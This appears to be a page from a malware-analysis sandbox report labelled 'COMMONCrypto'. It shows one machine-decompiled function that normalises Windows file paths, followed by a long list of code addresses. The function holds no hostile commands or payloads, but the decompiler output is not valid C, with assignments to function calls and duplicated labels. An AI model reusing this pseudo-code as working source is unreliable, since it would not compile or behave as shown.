COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E1E3C6E30(signed short __ecx, signed short __edx, signed int _a4, intOrPtr* _a8, char* _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				signed short _v34;
				intOrPtr _v36;
				signed short _v38;
				signed short _v40;
				char _v41;
				signed int _v48;
				short _v50;
				signed int _v52;
				signed short _v54;
				signed int _v56;
				char _v57;
				signed int _v64;
				signed int _v68;
				signed short _v70;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed short _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				char _v136;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t312;
				signed int _t313;
				char* _t315;
				unsigned int _t316;
				signed int _t317;
				short* _t319;
				void* _t320;
				signed int _t321;
				signed short _t327;
				signed int _t328;
				signed int _t335;
				signed short* _t336;
				signed int _t337;
				signed int _t338;
				signed int _t349;
				signed short _t352;
				signed int _t357;
				signed int _t360;
				signed int _t363;
				void* _t365;
				signed int _t366;
				signed short* _t367;
				signed int _t369;
				signed int _t375;
				signed int _t379;
				signed int _t384;
				signed int _t386;
				void* _t387;
				signed short _t389;
				intOrPtr* _t392;
				signed int _t397;
				unsigned int _t399;
				signed int _t401;
				signed int _t402;
				signed int _t407;
				void* _t415;
				signed short _t417;
				unsigned int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				intOrPtr* _t433;
				signed int _t435;
				void* _t436;
				signed int _t437;
				signed int _t438;
				signed int _t440;
				signed short _t443;
				void* _t444;
				signed int _t445;
				signed int _t446;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;

				_t425 = __edx;
				_push(0xfffffffe);
				_push(0x1e47fca8);
				_push(0x1e3f17f0);
				_push( *[fs:0x0]);
				_t312 =  *0x1e49d360;
				_v12 = _v12 ^ _t312;
				_t313 = _t312 ^ _t453;
				_v32 = _t313;
				_push(_t313);
				 *[fs:0x0] =  &_v20;
				_v116 = __edx;
				_t443 = __ecx;
				_v88 = __ecx;
				_t386 = _a4;
				_t433 = _a8;
				_v112 = _t433;
				_t315 = _a12;
				_v64 = _t315;
				_t392 = _a16;
				_v108 = _t392;
				if(_t433 != 0) {
					 *_t433 = 0;
				}
				if(_t315 != 0) {
					 *_t315 = 0;
				}
				if(_t425 > 0xffff) {
					_v116 = 0xffff;
				}
				 *_t392 = 0;
				 *((intOrPtr*)(_t392 + 4)) = 0;
				_t316 =  *_t443 & 0x0000ffff;
				_v104 = _t316;
				_t435 = _t316 >> 1;
				_v120 = _t435;
				if(_t435 == 0) {
					L124:
					_t317 = 0;
					goto L60;
				} else {
					_t319 =  *((intOrPtr*)(_t443 + 4));
					if( *_t319 != 0) {
						_t397 = _t435;
						_t320 = _t319 + _t435 * 2;
						_t425 = _t320 - 2;
						while(_t397 != 0) {
							if( *_t425 == 0x20) {
								_t397 = _t397 - 1;
								_t425 = _t425 - 2;
								continue;
							}
							if(_t397 == 0) {
								goto L124;
							}
							_t321 =  *(_t320 - 2) & 0x0000ffff;
							if(_t321 == 0x5c || _t321 == 0x2f) {
								_v57 = 0;
							} else {
								_v57 = 1;
							}
							_t399 = _v116 >> 1;
							_v92 = _t399;
							_v128 = _t399;
							E1E3EFA60(_t386, 0, _v116);
							_v56 = 0;
							_v52 = 0;
							_v50 = _v92 + _v92;
							_v48 = _t386;
							_t327 = E1E3C74C0(_t443);
							if(_t327 != 0) {
								_t389 = _t327 >> 0x10;
								_t328 = _t327 & 0x0000ffff;
								_v112 = _t328;
								_t437 = _v64;
								if(_t437 == 0) {
									L122:
									_t438 = _t328 + 8;
									_t401 = _v92;
									if(_t438 >= (_t401 + _t401 & 0x0000ffff)) {
										_t209 = _t438 + 2; // 0xddeeddf0
										_t402 = _t209;
										asm("sbb eax, eax");
										_t317 =  !0xffff & _t402;
									} else {
										E1E3D9BC6( &_v52, 0x1e381080);
										_t425 =  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2;
										E1E3E9377( &_v52,  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2, _v112);
										_t317 = _t438;
									}
									goto L60;
								}
								if(_t389 != 0) {
									_t425 = _t389;
									_t335 = E1E4246A7(_t443, _t389, _t437);
									if(_t335 < 0) {
										goto L124;
									}
									if( *_t437 != 0) {
										goto L124;
									}
									_t328 = _v112;
								}
								goto L122;
							} else {
								_t425 = _t443;
								_t336 =  *(_t425 + 4);
								_t407 =  *_t425 & 0x0000ffff;
								if(_t407 < 2) {
									L17:
									if(_t407 < 4 ||  *_t336 == 0 || _t336[1] != 0x3a) {
										_t337 = 5;
									} else {
										if(_t407 < 6) {
											L98:
											_t337 = 3;
											L23:
											 *_v108 = _t337;
											_t409 = 0;
											_v72 = 0;
											_v68 = 0;
											_v64 = 0;
											_v84 = 0;
											_v41 = 0;
											_t445 = 0;
											_v76 = 0;
											_v8 = 0;
											if(_t337 != 2) {
												_t338 = _t337 - 1;
												if(_t338 > 6) {
													L164:
													_t446 = 0;
													_v64 = 0;
													_t439 = _v92;
													goto L59;
												}
												switch( *((intOrPtr*)(_t338 * 4 +  &M1E3C749C))) {
													case 0:
														__ecx = 0;
														__eflags = 0;
														_v124 = 0;
														__esi = 2;
														while(1) {
															_v100 = __esi;
															__eflags = __esi - __edi;
															if(__esi >= __edi) {
																break;
															}
															__eax =  *(__edx + 4);
															__eax =  *( *(__edx + 4) + __esi * 2) & 0x0000ffff;
															__eflags = __eax - 0x5c;
															if(__eax == 0x5c) {
																L140:
																__ecx = __ecx + 1;
																_v124 = __ecx;
																__eflags = __ecx - 2;
																if(__ecx == 2) {
																	break;
																}
																L141:
																__esi = __esi + 1;
																continue;
															}
															__eflags = __eax - 0x2f;
															if(__eax != 0x2f) {
																goto L141;
															}
															goto L140;
														}
														__eax = __esi;
														_v80 = __esi;
														__eax =  *(__edx + 4);
														_v68 =  *(__edx + 4);
														__eax = __esi + __esi;
														_v72 = __ax;
														__eax =  *(__edx + 2) & 0x0000ffff;
														_v70 = __ax;
														_v76 = __esi;
														goto L80;
													case 1:
														goto L164;
													case 2:
														__eax = E1E3A52A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
														} else {
															__ebx = __eax + 0xc;
														}
														 *(__ebx + 4) =  *( *(__ebx + 4)) & 0x0000ffff;
														__eax = L1E3B2600( *( *(__ebx + 4)) & 0x0000ffff);
														__si = __ax;
														_v88 =  *(_v88 + 4);
														__ecx =  *( *(_v88 + 4)) & 0x0000ffff;
														__eax = L1E3B2600( *( *(_v88 + 4)) & 0x0000ffff);
														_v54 = __ax;
														__eflags = __ax - __ax;
														if(__eflags != 0) {
															__cx = __ax;
															L1E424735(__ecx, __edx, __eflags) = 0x3d;
															_v40 = __ax;
															__si = _v54;
															_v38 = __si;
															_v36 = 0x3a;
															 &_v40 =  &_v136;
															E1E3EBB40(__ecx,  &_v136,  &_v40) =  &_v52;
															__eax =  &_v136;
															__eax = E1E3D2010(__ecx, 0,  &_v136,  &_v52);
															__eflags = __eax;
															if(__eax >= 0) {
																__ax = _v52;
																_v56 = __eax;
																__edx = __ax & 0x0000ffff;
																__ecx = __edx;
																__ecx = __edx >> 1;
																_v100 = __ecx;
																__eflags = __ecx - 3;
																if(__ecx <= 3) {
																	L155:
																	__ebx = _v48;
																	L156:
																	_v72 = __ax;
																	goto L119;
																}
																__eflags = __ecx - _v92;
																if(__ecx >= _v92) {
																	goto L155;
																}
																__esi = 0x5c;
																__ebx = _v48;
																 *(__ebx + __ecx * 2) = __si;
																__eax = __edx + 2;
																_v56 = __edx + 2;
																_v52 = __ax;
																goto L156;
															}
															__eflags = __eax - 0xc0000023;
															if(__eax != 0xc0000023) {
																__eax = 0;
																_v52 = __ax;
																_v40 = __si;
																_v38 = 0x5c003a;
																_v34 = __ax;
																__edx =  &_v40;
																__ecx =  &_v52;
																L1E424658(__ecx,  &_v40) = 8;
																_v72 = __ax;
																__ebx = _v48;
																__ax = _v52;
																_v56 = 8;
																goto L119;
															}
															__ax = _v52;
															_v56 = __eax;
															__eax = __ax & 0x0000ffff;
															__eax = (__ax & 0x0000ffff) + 2;
															_v64 = __eax;
															__eflags = __eax - 0xffff;
															if(__eax <= 0xffff) {
																_v72 = __ax;
																__ebx = _v48;
																goto L119;
															}
															__esi = 0;
															_v64 = 0;
															__ebx = _v48;
															__edi = _v92;
															goto L58;
														} else {
															__eax =  *__ebx;
															_v72 =  *__ebx;
															__eax =  *(__ebx + 4);
															_v68 =  *(__ebx + 4);
															__edx =  &_v72;
															__ecx =  &_v52;
															__eax = E1E3D9BC6(__ecx,  &_v72);
															__ebx = _v48;
															__eax = _v52 & 0x0000ffff;
															_v56 = _v52 & 0x0000ffff;
															L119:
															__eax = 3;
															_v80 = 3;
															__esi = 2;
															_v76 = 2;
															__edx = _v88;
															goto L25;
														}
													case 3:
														__eax = E1E3A52A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
															__eflags = __ebx;
															__esi = _v76;
														} else {
															__ebx = __eax + 0xc;
														}
														__ecx = __ebx;
														__eax = L1E3A83AE(__ebx);
														_v80 = __eax;
														__ecx =  *__ebx;
														_v72 =  *__ebx;
														__ecx =  *(__ebx + 4);
														_v68 = __ecx;
														__eflags = __eax - 3;
														if(__eax == 3) {
															__eax = 4;
															_v72 = __ax;
														} else {
															__ecx = __eax + __eax;
															_v72 = __cx;
														}
														goto L80;
													case 4:
														_t340 = E1E3A52A5(0);
														_v84 = _t340;
														_v41 = 1;
														__eflags = _t340;
														if(_t340 == 0) {
															_t428 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
															_t445 = _v76;
														} else {
															_t428 = _t340 + 0xc;
															 *((intOrPtr*)(_v108 + 4)) =  *((intOrPtr*)(_t340 + 0x14));
														}
														_v72 =  *_t428;
														_v68 = _t428[2];
														_v80 = L1E3A83AE(_t428);
														L80:
														E1E3D9BC6( &_v52,  &_v72);
														_t386 = _v48;
														_v56 = _v52 & 0x0000ffff;
														_t425 = _v88;
														goto L25;
													case 5:
														__eax = 4;
														_v80 = 4;
														__esi = 4;
														_v76 = 4;
														__eflags = __edi - 4;
														if(__edi < 4) {
															__esi = __edi;
															_v76 = __esi;
														}
														__eax =  *0x1e381080;
														_v72 =  *0x1e381080;
														__eax =  *0x1e381084;
														_v68 =  *0x1e381084;
														__edx =  &_v72;
														__ecx =  &_v52;
														__eax = E1E3D9BC6(__ecx,  &_v72);
														__eax = _v52 & 0x0000ffff;
														_v56 = __eax;
														__edx = _v88;
														__ebx = _v48;
														__eflags = __eax - 6;
														if(__eax >= 6) {
															__eax =  *(__edx + 4);
															__ax =  *((intOrPtr*)(__eax + 4));
															 *(__ebx + 4) =  *((intOrPtr*)(__eax + 4));
														}
														__eax = _v108;
														__eflags =  *_v108 - 7;
														if( *_v108 == 7) {
															_v57 = 0;
														}
														goto L25;
												}
											} else {
												_v80 = 3;
												L25:
												_t349 = _v104 + (_v72 & 0x0000ffff) - _t445 + _t445;
												_v104 = _t349;
												_t415 = _t349 + 2;
												if(_t415 > _v116) {
													if(_t435 <= 1) {
														if( *( *(_t425 + 4)) != 0x2e) {
															goto L72;
														}
														if(_t435 != 1) {
															asm("sbb esi, esi");
															_t446 =  !_t445 & _v104;
															_v64 = _t446;
															_t439 = _v92;
															L58:
															_t409 = _v84;
															L59:
															_v8 = 0xfffffffe;
															E1E3C746D(_t386, _t409, _t439, _t446);
															_t317 = _t446;
															L60:
															 *[fs:0x0] = _v20;
															_pop(_t436);
															_pop(_t444);
															_pop(_t387);
															return E1E3EB640(_t317, _t387, _v32 ^ _t453, _t425, _t436, _t444);
														}
														_t417 = _v72;
														if(_t417 != 8) {
															if(_v116 >= (_t417 & 0x0000ffff)) {
																_t352 = _v56;
																_t418 = _t352 & 0x0000ffff;
																_v104 = _t418;
																_t419 = _t418 >> 1;
																_v100 = _t419;
																if(_t419 != 0) {
																	if( *((short*)(_t386 + _t419 * 2 - 2)) == 0x5c) {
																		_t352 = _v104 + 0xfffffffe;
																		_v56 = _t352;
																		_v52 = _t352;
																	}
																}
																L27:
																_t420 = 0;
																_v100 = 0;
																L28:
																L28:
																if(_t420 < (_t352 & 0x0000ffff) >> 1) {
																	goto L69;
																} else {
																	_t422 = (_v56 & 0x0000ffff) >> 1;
																	_v96 = _t422;
																}
																while(_t445 < _t435) {
																	_t363 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																	if(_t363 == 0x5c) {
																		L44:
																		if(_t422 == 0) {
																			L46:
																			 *(_t386 + _t422 * 2) = 0x5c;
																			_t422 = _t422 + 1;
																			_v96 = _t422;
																			L43:
																			_t445 = _t445 + 1;
																			_v76 = _t445;
																			continue;
																		}
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			goto L43;
																		}
																		goto L46;
																	}
																	_t365 = _t363 - 0x2e;
																	if(_t365 == 0) {
																		_t126 = _t445 + 1; // 0x2
																		_t366 = _t126;
																		_v104 = _t366;
																		if(_t366 == _t435) {
																			goto L43;
																		}
																		_t367 =  *(_t425 + 4);
																		_t440 =  *(_t367 + 2 + _t445 * 2) & 0x0000ffff;
																		_v108 = _t440;
																		_t435 = _v120;
																		if(_t440 != 0x5c) {
																			if(_v108 == 0x2f) {
																				goto L83;
																			}
																			if(_v108 != 0x2e) {
																				L35:
																				while(_t445 < _t435) {
																					_t369 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																					if(_t369 == 0x5c || _t369 == 0x2f) {
																						if(_t445 < _t435) {
																							if(_t422 >= 2) {
																								if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x2e) {
																									if( *((short*)(_t386 + _t422 * 2 - 4)) != 0x2e) {
																										_t422 = _t422 - 1;
																										_v96 = _t422;
																									}
																								}
																							}
																						}
																						break;
																					} else {
																						 *(_t386 + _t422 * 2) = _t369;
																						_t422 = _t422 + 1;
																						_v96 = _t422;
																						_t445 = _t445 + 1;
																						_v76 = _t445;
																						continue;
																					}
																				}
																				_t445 = _t445 - 1;
																				_v76 = _t445;
																				goto L43;
																			}
																			_t155 = _t445 + 2; // 0x3
																			_t425 = _v88;
																			if(_t155 == _t435) {
																				while(1) {
																					L103:
																					if(_t422 < _v80) {
																						break;
																					}
																					 *(_t386 + _t422 * 2) = 0;
																					_t425 = _v88;
																					if( *(_t386 + _t422 * 2) != 0x5c) {
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																						continue;
																					} else {
																						goto L105;
																					}
																					while(1) {
																						L105:
																						if(_t422 < _v80) {
																							goto L180;
																						}
																						 *(_t386 + _t422 * 2) = 0;
																						_t435 = _v120;
																						if( *(_t386 + _t422 * 2) == 0x5c) {
																							if(_t422 < _v80) {
																								goto L180;
																							}
																							L110:
																							_t445 = _t445 + 1;
																							_v76 = _t445;
																							goto L43;
																						}
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																					}
																					break;
																				}
																				L180:
																				_t422 = _t422 + 1;
																				_v96 = _t422;
																				goto L110;
																			}
																			_t375 =  *(_t367 + 4 + _t445 * 2) & 0x0000ffff;
																			if(_t375 != 0x5c) {
																				if(_t375 != 0x2f) {
																					goto L35;
																				}
																			}
																			goto L103;
																		}
																		L83:
																		_t445 = _v104;
																		_v76 = _t445;
																		goto L43;
																	}
																	if(_t365 == 1) {
																		goto L44;
																	} else {
																		goto L35;
																	}
																}
																_t449 = _v80;
																if(_v57 != 0) {
																	if(_t422 > _t449) {
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			_t422 = _t422 - 1;
																			_v96 = _t422;
																		}
																	}
																}
																_t439 = _v92;
																if(_t422 >= _v92) {
																	L52:
																	if(_t422 == 0) {
																		L56:
																		_t425 = _t422 + _t422;
																		_v52 = _t425;
																		if(_v112 != 0) {
																			_t357 = _t422;
																			while(1) {
																				_v100 = _t357;
																				if(_t357 == 0) {
																					break;
																				}
																				if( *((short*)(_t386 + _t357 * 2 - 2)) == 0x5c) {
																					break;
																				}
																				_t357 = _t357 - 1;
																			}
																			if(_t357 >= _t422) {
																				L113:
																				 *_v112 = 0;
																				goto L57;
																			}
																			if(_t357 < _t449) {
																				goto L113;
																			}
																			 *_v112 = _t386 + _t357 * 2;
																		}
																		L57:
																		_t446 = _t425 & 0x0000ffff;
																		_v64 = _t446;
																		goto L58;
																	}
																	_t422 = _t422 - 1;
																	_v96 = _t422;
																	_t360 =  *(_t386 + _t422 * 2) & 0x0000ffff;
																	if(_t360 == 0x20) {
																		goto L51;
																	}
																	if(_t360 == 0x2e) {
																		goto L51;
																	}
																	_t422 = _t422 + 1;
																	_v96 = _t422;
																	goto L56;
																} else {
																	L51:
																	 *(_t386 + _t422 * 2) = 0;
																	goto L52;
																}
																L69:
																if( *((short*)(_t386 + _t420 * 2)) == 0x2f) {
																	 *((short*)(_t386 + _t420 * 2)) = 0x5c;
																}
																_t420 = _t420 + 1;
																_v100 = _t420;
																_t352 = _v56;
																goto L28;
															}
															_t446 = _t417 & 0x0000ffff;
															_v64 = _t446;
															_t439 = _v92;
															goto L58;
														}
														if(_v116 > 8) {
															goto L26;
														}
														_t446 = 0xa;
														_v64 = 0xa;
														_t439 = _v92;
														goto L58;
													}
													L72:
													if(_t415 > 0xffff) {
														_t446 = 0;
													}
													_v64 = _t446;
													_t439 = _v92;
													goto L58;
												}
												L26:
												_t352 = _v56;
												goto L27;
											}
										}
										_t379 = _t336[2] & 0x0000ffff;
										if(_t379 != 0x5c) {
											if(_t379 == 0x2f) {
												goto L22;
											}
											goto L98;
										}
										L22:
										_t337 = 2;
									}
									goto L23;
								}
								_t450 =  *_t336 & 0x0000ffff;
								if(_t450 == 0x5c || _t450 == 0x2f) {
									if(_t407 < 4) {
										L132:
										_t337 = 4;
										goto L23;
									}
									_t451 = _t336[1] & 0x0000ffff;
									if(_t451 != 0x5c) {
										if(_t451 == 0x2f) {
											goto L87;
										}
										goto L132;
									}
									L87:
									if(_t407 < 6) {
										L135:
										_t337 = 1;
										goto L23;
									}
									_t452 = _t336[2] & 0x0000ffff;
									if(_t452 != 0x2e) {
										if(_t452 == 0x3f) {
											goto L89;
										}
										goto L135;
									}
									L89:
									if(_t407 < 8) {
										L134:
										_t337 = ((0 | _t407 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
										goto L23;
									}
									_t384 = _t336[3] & 0x0000ffff;
									if(_t384 != 0x5c) {
										if(_t384 == 0x2f) {
											goto L91;
										}
										goto L134;
									}
									L91:
									_t337 = 6;
									goto L23;
								} else {
									goto L17;
								}
							}
						}
					}
					goto L124;
				}
			}

0x1e3c6e30
0x1e3c6e35
0x1e3c6e37
0x1e3c6e3c
0x1e3c6e47
0x1e3c6e4b
0x1e3c6e50
0x1e3c6e53
0x1e3c6e55
0x1e3c6e5b
0x1e3c6e5f
0x1e3c6e65
0x1e3c6e68
0x1e3c6e6a
0x1e3c6e6d
0x1e3c6e70
0x1e3c6e73
0x1e3c6e76
0x1e3c6e79
0x1e3c6e7c
0x1e3c6e7f
0x1e3c6e84
0x1e3c710f
0x1e3c710f
0x1e3c6e8c
0x1e3c6e8e
0x1e3c6e8e
0x1e3c6e97
0x1e40f5d3
0x1e40f5d3
0x1e3c6e9d
0x1e3c6ea3
0x1e3c6eaa
0x1e3c6ead
0x1e3c6eb2
0x1e3c6eb4
0x1e3c6eb7
0x1e3c7466
0x1e3c7466
0x00000000
0x1e3c6ebd
0x1e3c6ebd
0x1e3c6ec4
0x1e3c6eca
0x1e3c6ecc
0x1e3c6ecf
0x1e3c6ed2
0x1e3c6ede
0x1e40f5df
0x1e40f5e0
0x00000000
0x1e40f5e0
0x1e3c6ee6
0x00000000
0x00000000
0x1e3c6eec
0x1e3c6ef3
0x1e3c7181
0x1e3c6f02
0x1e3c6f02
0x1e3c6f02
0x1e3c6f0b
0x1e3c6f0d
0x1e3c6f10
0x1e3c6f17
0x1e3c6f21
0x1e3c6f24
0x1e3c6f2d
0x1e3c6f31
0x1e3c6f36
0x1e3c6f3d
0x1e3c7413
0x1e3c7416
0x1e3c7419
0x1e3c741c
0x1e3c7421
0x1e3c742b
0x1e3c742b
0x1e3c742e
0x1e3c7439
0x1e40f60b
0x1e40f60b
0x1e40f615
0x1e40f619
0x1e3c743f
0x1e3c7447
0x1e3c7454
0x1e3c745a
0x1e3c745f
0x1e3c745f
0x00000000
0x1e3c7439
0x1e3c7425
0x1e40f5e9
0x1e40f5ed
0x1e40f5f4
0x00000000
0x00000000
0x1e40f5fd
0x00000000
0x00000000
0x1e40f603
0x1e40f603
0x00000000
0x1e3c6f43
0x1e3c6f43
0x1e3c6f45
0x1e3c6f48
0x1e3c6f4e
0x1e3c6f65
0x1e3c6f68
0x1e3c721f
0x1e3c6f83
0x1e3c6f86
0x1e3c72dc
0x1e3c72dc
0x1e3c6f9e
0x1e3c6fa1
0x1e3c6fa3
0x1e3c6fa5
0x1e3c6fa8
0x1e3c6fab
0x1e3c6fae
0x1e3c6fb1
0x1e3c6fb4
0x1e3c6fb6
0x1e3c6fb9
0x1e3c6fbf
0x1e3c718a
0x1e3c718e
0x1e40f831
0x1e40f831
0x1e40f833
0x1e40f836
0x00000000
0x1e40f836
0x1e3c7194
0x00000000
0x1e40f658
0x1e40f658
0x1e40f65a
0x1e40f65d
0x1e40f662
0x1e40f662
0x1e40f665
0x1e40f667
0x00000000
0x00000000
0x1e40f669
0x1e40f66c
0x1e40f670
0x1e40f673
0x1e40f67a
0x1e40f67a
0x1e40f67b
0x1e40f67e
0x1e40f681
0x00000000
0x00000000
0x1e40f683
0x1e40f683
0x00000000
0x1e40f683
0x1e40f675
0x1e40f678
0x00000000
0x00000000
0x00000000
0x1e40f678
0x1e40f686
0x1e40f688
0x1e40f68b
0x1e40f68e
0x1e40f691
0x1e40f694
0x1e40f698
0x1e40f69c
0x1e40f6a0
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3c7397
0x1e3c739c
0x1e3c739f
0x1e3c73a3
0x1e3c73a5
0x1e40f6bb
0x1e40f6c1
0x1e40f6c4
0x1e3c73ab
0x1e3c73ab
0x1e3c73ab
0x1e3c73b1
0x1e3c73b5
0x1e3c73ba
0x1e3c73c0
0x1e3c73c3
0x1e3c73c7
0x1e3c73cc
0x1e3c73d0
0x1e3c73d3
0x1e40f6cc
0x1e40f6d4
0x1e40f6d9
0x1e40f6dd
0x1e40f6e1
0x1e40f6e5
0x1e40f6f0
0x1e40f6fc
0x1e40f700
0x1e40f709
0x1e40f70e
0x1e40f710
0x1e40f784
0x1e40f788
0x1e40f78b
0x1e40f78e
0x1e40f790
0x1e40f792
0x1e40f795
0x1e40f798
0x1e40f7b7
0x1e40f7b7
0x1e40f7ba
0x1e40f7ba
0x00000000
0x1e40f7ba
0x1e40f79a
0x1e40f79d
0x00000000
0x00000000
0x1e40f79f
0x1e40f7a4
0x1e40f7a7
0x1e40f7ab
0x1e40f7ae
0x1e40f7b1
0x00000000
0x1e40f7b1
0x1e40f712
0x1e40f717
0x1e40f74c
0x1e40f74e
0x1e40f752
0x1e40f756
0x1e40f75d
0x1e40f761
0x1e40f764
0x1e40f76c
0x1e40f771
0x1e40f775
0x1e40f778
0x1e40f77c
0x00000000
0x1e40f77c
0x1e40f719
0x1e40f71d
0x1e40f720
0x1e40f723
0x1e40f726
0x1e40f729
0x1e40f72e
0x1e40f740
0x1e40f744
0x00000000
0x1e40f744
0x1e40f730
0x1e40f732
0x1e40f735
0x1e40f738
0x00000000
0x1e3c73d9
0x1e3c73d9
0x1e3c73db
0x1e3c73de
0x1e3c73e1
0x1e3c73e4
0x1e3c73e7
0x1e3c73ea
0x1e3c73ef
0x1e3c73f2
0x1e3c73f6
0x1e3c73f9
0x1e3c73f9
0x1e3c73fe
0x1e3c7401
0x1e3c7406
0x1e3c7409
0x00000000
0x1e3c7409
0x00000000
0x1e40f7c5
0x1e40f7ca
0x1e40f7cd
0x1e40f7d1
0x1e40f7d3
0x1e40f7da
0x1e40f7e0
0x1e40f7e3
0x1e40f7e3
0x1e40f7e6
0x1e40f7d5
0x1e40f7d5
0x1e40f7d5
0x1e40f7e9
0x1e40f7eb
0x1e40f7f0
0x1e40f7f3
0x1e40f7f5
0x1e40f7f8
0x1e40f7fb
0x1e40f7fe
0x1e40f801
0x1e40f80f
0x1e40f814
0x1e40f803
0x1e40f803
0x1e40f806
0x1e40f806
0x00000000
0x00000000
0x1e3c719d
0x1e3c71a2
0x1e3c71a5
0x1e3c71a9
0x1e3c71ab
0x1e40f826
0x1e40f829
0x1e3c71b1
0x1e3c71b1
0x1e3c71ba
0x1e3c71ba
0x1e3c71bf
0x1e3c71c5
0x1e3c71cf
0x1e3c71d2
0x1e3c71d8
0x1e3c71dd
0x1e3c71e4
0x1e3c71e7
0x00000000
0x00000000
0x1e3c7275
0x1e3c727a
0x1e3c727d
0x1e3c727f
0x1e3c7282
0x1e3c7284
0x1e40f6a8
0x1e40f6aa
0x1e40f6aa
0x1e3c728a
0x1e3c728f
0x1e3c7292
0x1e3c7297
0x1e3c729a
0x1e3c729d
0x1e3c72a0
0x1e3c72a5
0x1e3c72a9
0x1e3c72ac
0x1e3c72af
0x1e3c72b2
0x1e3c72b5
0x1e3c72b7
0x1e3c72ba
0x1e3c72be
0x1e3c72be
0x1e3c72c2
0x1e3c72c5
0x1e3c72c8
0x1e40f6b2
0x1e40f6b2
0x00000000
0x00000000
0x1e3c6fc5
0x1e3c6fc5
0x1e3c6fcc
0x1e3c6fd8
0x1e3c6fda
0x1e3c6fdd
0x1e3c6fe3
0x1e3c7162
0x1e40f845
0x00000000
0x00000000
0x1e40f84e
0x1e40f8c4
0x1e40f8c8
0x1e40f8cb
0x1e40f8ce
0x1e3c70e0
0x1e3c70e0
0x1e3c70e3
0x1e3c70e3
0x1e3c70ea
0x1e3c70ef
0x1e3c70f1
0x1e3c70f4
0x1e3c70fc
0x1e3c70fd
0x1e3c70fe
0x1e3c710c
0x1e3c710c
0x1e40f850
0x1e40f858
0x1e40f87a
0x1e40f88a
0x1e40f88d
0x1e40f890
0x1e40f893
0x1e40f895
0x1e40f898
0x1e40f8a4
0x1e40f8ad
0x1e40f8b0
0x1e40f8b3
0x1e40f8b3
0x1e40f8a4
0x1e3c6fec
0x1e3c6fec
0x1e3c6fee
0x00000000
0x1e3c6ff1
0x1e3c6ff8
0x00000000
0x1e3c6ffe
0x1e3c7004
0x1e3c7006
0x1e3c7006
0x1e3c7010
0x1e3c7017
0x1e3c701e
0x1e3c7072
0x1e3c7074
0x1e3c707e
0x1e3c7083
0x1e3c7087
0x1e3c7088
0x1e3c706c
0x1e3c706c
0x1e3c706d
0x00000000
0x1e3c706d
0x1e3c707c
0x00000000
0x00000000
0x00000000
0x1e3c707c
0x1e3c7020
0x1e3c7023
0x1e3c71ef
0x1e3c71ef
0x1e3c71f2
0x1e3c71f7
0x00000000
0x00000000
0x1e3c71fd
0x1e3c7200
0x1e3c7205
0x1e3c720b
0x1e3c720e
0x1e3c72eb
0x00000000
0x00000000
0x1e3c72f6
0x00000000
0x1e3c7030
0x1e3c7037
0x1e3c703e
0x1e3c7055
0x1e3c705a
0x1e3c7062
0x1e40f908
0x1e40f90e
0x1e40f90f
0x1e40f90f
0x1e40f908
0x1e3c7062
0x1e3c705a
0x00000000
0x1e3c7045
0x1e3c7045
0x1e3c7049
0x1e3c704a
0x1e3c704d
0x1e3c704e
0x00000000
0x1e3c704e
0x1e3c703e
0x1e3c7068
0x1e3c7069
0x00000000
0x1e3c7069
0x1e3c72fc
0x1e3c7301
0x1e3c7304
0x1e3c7314
0x1e3c7314
0x1e3c7319
0x00000000
0x00000000
0x1e3c7325
0x1e3c732d
0x1e3c7330
0x1e3c7356
0x1e3c7357
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3c7332
0x1e3c7332
0x1e3c7337
0x00000000
0x00000000
0x1e3c7343
0x1e3c734b
0x1e3c734e
0x1e3c7361
0x00000000
0x00000000
0x1e3c7367
0x1e3c7367
0x1e3c7368
0x00000000
0x1e3c7368
0x1e3c7350
0x1e3c7351
0x1e3c7351
0x00000000
0x1e3c7332
0x1e40f8f9
0x1e40f8f9
0x1e40f8fa
0x00000000
0x1e40f8fa
0x1e3c7306
0x1e3c730e
0x1e40f8ee
0x00000000
0x00000000
0x1e40f8f4
0x00000000
0x1e3c730e
0x1e3c7214
0x1e3c7214
0x1e3c7217
0x00000000
0x1e3c7217
0x1e3c702c
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3c702c
0x1e3c708d
0x1e3c7094
0x1e3c7098
0x1e3c70a0
0x1e3c738c
0x1e3c738d
0x1e3c738d
0x1e3c70a0
0x1e3c7098
0x1e3c70a6
0x1e3c70ab
0x1e3c70b3
0x1e3c70b5
0x1e3c70cd
0x1e3c70cd
0x1e3c70d0
0x1e3c70d8
0x1e3c711a
0x1e3c711c
0x1e3c711c
0x1e3c7121
0x00000000
0x00000000
0x1e3c7129
0x00000000
0x00000000
0x1e3c712b
0x1e3c712b
0x1e3c7130
0x1e3c737e
0x1e3c7381
0x00000000
0x1e3c7381
0x1e3c7138
0x00000000
0x00000000
0x1e3c7144
0x1e3c7144
0x1e3c70da
0x1e3c70da
0x1e3c70dd
0x00000000
0x1e3c70dd
